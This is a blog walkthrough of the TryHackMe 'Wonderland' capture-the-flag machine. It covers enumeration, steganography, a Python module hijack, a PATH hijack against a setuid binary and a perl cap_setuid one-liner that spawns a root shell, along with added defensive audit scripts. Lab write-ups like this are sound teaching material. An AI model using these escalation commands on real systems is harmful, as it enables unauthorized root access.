---
title: "TryHackMe: Wonderland"
pubDatetime: 2020-06-05T23:24:43.000Z
tags: ["tryhackme", "writeup"]
description: "New week, new challenge. This is my writeup of the Wonderland machine."
---
# Info

![](/images/size/w1000/2020/07/image-15.png)

**Name**: Wonderland  
**Difficulty**: Medium  
**Released**: Fri 05 Jun 2020  
**Creator**: NinjaJc01  
**URL**: [https://tryhackme.com/room/wonderland](https://tryhackme.com/room/wonderland)

# Enumeration

As always, we start with an nmap scan of the machine:

```bash
nmap -sC -sV -oA nmap/all-tcp 10.10.167.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 23:56 CEST
Nmap scan report for 10.10.167.35
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We only have two ports open: 22 and 80.

Visiting the web server reveals the following page:

![](/images/size/w1000/2020/06/follow_white_rabbit.png)

We also do a directory scan with `ffuf` and find the following directories:

```bash
ffuf -u http://10.10.167.35/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.167.35/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
poem                    [Status: 301, Size: 0, Words: 1, Lines: 1]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [20473/20473] :: Job [1/1] :: 853 req/sec :: Duration: [0:00:24] :: Errors: 0 ::
```

After looking at the different directories I didn't find anything of interest, so I decided to download the first image we found and see if something was hidden in it.

```bash
wget http://10.10.167.35/img/white_rabbit_1.jpg
--2020-06-06 00:04:02--  http://10.10.167.35/img/white_rabbit_1.jpg
Connecting to 10.10.167.35:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’

white_rabbit_1.jpg	100%[==============================================================>]   1.90M  4.57MB/s    in 0.4s    

2020-06-06 00:04:02 (4.57 MB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]

steghide extract -sf white_rabbit_1.jpg 
Enter passphrase: 
wrote extracted data to "hint.txt".
s1gh@kali:~/TryHackMe/Wonderland/files$ cat hint.txt 
follow the r a b b i t
```

My immediate thought was that `r a b b i t` might be pointing to a URL:

![](/images/size/w1000/2020/06/rabbit.png)

Looking at the source reveals something that looks like credentials:

![](/images/size/w1000/2020/06/creds.png)

We can now use the credentials above and SSH into the box.

# Initial Foothold

We now have access to the machine, but running `ls -la` reveals something weird: the `root.txt` file is located in our user's home directory...

```bash
ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root  root  4096 May 25 17:52 ..
lrwxrwxrwx 1 root  root     9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice  807 May 25 02:36 .profile
-rw------- 1 root  root    66 May 25 17:08 root.txt
-rw-r--r-- 1 root  root  3577 May 25 02:43 walrus_and_the_carpenter.py
```

After a bit of tinkering (and looking at the hint) we try to `cat /root/user.txt`.

```bash
cat /root/user.txt
thm{FLAG-REDACTED}
```

We finally have the user flag! Now, let's priv esc to root.

# Privilege Escalation

Looking at our privileges with `sudo -l` reveals the following:

```bash
sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```

We can run `sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py`, i.e. execute the script as the user `rabbit`.

Even though we only have read access to `walrus_and_the_carpenter.py` and can't edit the file, let's see what the file is doing when executed.

```python
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

[...]

for i in range(10):
    line = random.choice(poem.split("\n"))
```

Due to the length of the file, I've removed some of the poem that's printed to the screen when we're executing the file.

At the top of the file, we can see that the python module `random` is imported.  
So, what if we create a file named `random.py` in our current working directory (`/home/alice`, which is also the directory the script lives in, and the script's directory is the first entry on Python's module search path) that executes `/bin/bash`? That way our `random.py` should be loaded instead of the "real" `random` module, and in turn give us a shell as the `rabbit` user.

Our `random.py`:

```python
import os

os.system("/bin/bash")
```

Executing the python script:

```bash
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
```

Awesome! We have escalated our privileges to the `rabbit` user.

Looking in `/home/rabbit/` we find a setuid binary, and by examining the file we see that `date` is executed without specifying an absolute path:

```bash
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
```

We can abuse this by exporting our own $PATH, writing a small script called `date` and running the setuid binary.

**Exporting our own $PATH**:

```bash
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
```

Now, every time a program is called without specifying an absolute path, our shell will first look in `/tmp`.

**Creating our malicious date file**:

We now create a shell script called `date`, place that in `/tmp` and make it executable with `chmod +x /tmp/date`.

```bash
rabbit@wonderland:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash
```

All we now need to do is run the setuid binary and we should escalate to the user `hatter`.

```bash
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
```

Awesome! We're getting close.
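As an added example of the defensive side of this step (my own code, not part of the room), the function below walks a `PATH` in the same order the shell does, resolves a command and flags every searched directory the current user can write to; the demo reproduces the `/tmp` prepend with a harmless stand-in for the planted `date` script.

```python
"""Added example (not from the room): audit a PATH the way the shell will
search it, and flag writable directories that can shadow a command such as
the `date` the setuid teaParty binary calls by bare name."""
import os
import tempfile
from typing import List, Optional, Tuple


def path_dirs(path_env: str) -> List[str]:
    return [d for d in path_env.split(os.pathsep) if d]


def audit(command: str, path_env: str) -> Tuple[Optional[str], List[str]]:
    """Resolve `command` along path_env in lookup order, like the shell does.

    Returns (resolved_path, suspicious): suspicious lists every directory
    searched up to and including the one that supplied the command that the
    current user can write to.  Any entry there lets a planted file win.
    """
    suspicious = []
    for d in path_dirs(path_env):
        if os.path.isdir(d) and os.access(d, os.W_OK):
            suspicious.append(d)
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate, suspicious
    return None, suspicious


def demo_hijack() -> dict:
    """Constructed scenario mirroring the box: a `date` script is planted in a
    directory that is then prepended to PATH, as rabbit did with /tmp."""
    system_path = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    with tempfile.TemporaryDirectory() as planted_dir:
        planted = os.path.join(planted_dir, "date")
        with open(planted, "w") as fh:
            # harmless stand-in for the shell-spawning script on the page
            fh.write("#!/bin/sh\necho hijacked\n")
        os.chmod(planted, 0o755)
        hijacked, flagged = audit("date", planted_dir + os.pathsep + system_path)
        untouched, _ = audit("date", system_path)
        return {
            "hijacked_resolves_to_plant": hijacked == planted,
            "plant_dir_flagged": planted_dir in flagged,
            "system_path_unaffected": untouched != planted,
        }
```

A setuid program should not depend on the inherited `PATH` at all: calling `/bin/date` by absolute path, or resetting the environment before `system()`, removes this class of bug.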

Looking in the home directory of the user `hatter` reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user `hatter`:

```bash
ssh hatter@10.10.167.35
hatter@10.10.167.35's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jun  5 22:48:04 UTC 2020

  System load:  0.07               Processes:           95
  Usage of /:   19.4% of 19.56GB   Users logged in:     1
  Memory usage: 32%                IP address for eth0: 10.10.167.35
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jun  5 22:47:57 2020 from 10.11.4.205
hatter@wonderland:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)
```

Doing some basic enumeration reveals that `perl` has the following capability set: `cap_setuid+ep`.

```bash
hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```

We can easily abuse this and escalate to root!

```bash
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)
```
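For the detection side, here is an added example (my own code, not from the room) that triages `getcap -r /` output for file capabilities granting root-equivalent power; the three lines shown above are embedded as the constructed sample input, and both the older `path = caps` and the newer `path caps` output formats of libcap are accepted.

```python
"""Added example (not from the room): triage `getcap -r /` output for file
capabilities that give a binary root-equivalent power."""
import re
from typing import Dict, List, Tuple

# Sample input: the three getcap lines shown above, constructed as a string.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""

# Capabilities that let a process become root or bypass file permissions.
ESCALATION_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# One clause of a capability spec: comma-separated names, '+' or '=', flags.
CLAUSE_RE = re.compile(r"^([\w,]*)[+=]([eip]*)$")


def parse_capset(spec: str) -> Dict[str, str]:
    """'cap_setuid,cap_net_raw+ep' or the newer 'cap_setuid=ep' -> {cap: flags}.
    A bare '=ep' clause grants every capability and is recorded as 'all'."""
    caps: Dict[str, str] = {}
    for clause in spec.split():
        m = CLAUSE_RE.match(clause)
        if m:
            names, flags = m.groups()
            for name in (names.split(",") if names else ["all"]):
                caps[name] = flags
    return caps


def risky_binaries(getcap_output: str) -> List[Tuple[str, List[str]]]:
    """(path, [caps]) for each binary whose effective set holds an escalation
    capability; accepts both 'path = caps' (older libcap) and 'path caps'."""
    findings = []
    for line in getcap_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        spec = parts[2] if parts[1] == "=" and len(parts) == 3 else " ".join(parts[1:])
        caps = parse_capset(spec)
        bad = sorted(n for n, f in caps.items()
                     if "e" in f and (n in ESCALATION_CAPS or n == "all"))
        if bad:
            findings.append((parts[0], bad))
    return findings
```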

We can now finally get the `root.txt` flag as well!

```bash
# cat /home/alice/root.txt
thm{FLAG-REDACTED}
```

![](https://media1.tenor.com/images/7c34db41bb5a790a561f493923b3bb43/tenor.gif)